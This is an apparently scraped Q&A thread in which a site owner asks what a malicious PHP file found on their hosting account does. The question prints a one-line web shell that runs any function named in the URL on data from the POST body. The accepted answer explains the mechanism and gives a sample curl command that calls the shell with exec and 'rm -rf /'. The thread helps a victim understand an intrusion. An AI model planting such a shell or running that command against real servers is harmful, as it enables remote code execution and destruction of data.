Just found malicious php code

Question

Just found malicious php code

I found a malicious php file in my hosting account using this code:

<?=$_GET[0]($_POST[1]);?>

Please help me better understand this code, what are the features of this code for the user?

Thanks in advance.

+3

php shell

Mikerobenics Feb 20 '14 at 10:41

source share

1 answer

deceze · Accepted Answer · 2014-02-20T10:45:55+0000

$func = 'strlen';
$arg  = 'foo';

echo $func($arg); // output: 3

You are looking at calling a function variable. In your case, the function name comes from the query string in the URL and the argument from the HTTP POST body. Thus, it can generally accomplish something. Probably someone will try to use it to execute shell code through exec.

eg:.

$ curl example.com/infected_file.php?exec -d 'rm%20-rf%20/'

_{(Not 100% sure that this will do it as is, and I don't want to try, but you will get this idea.)}

Just found malicious php code

More articles: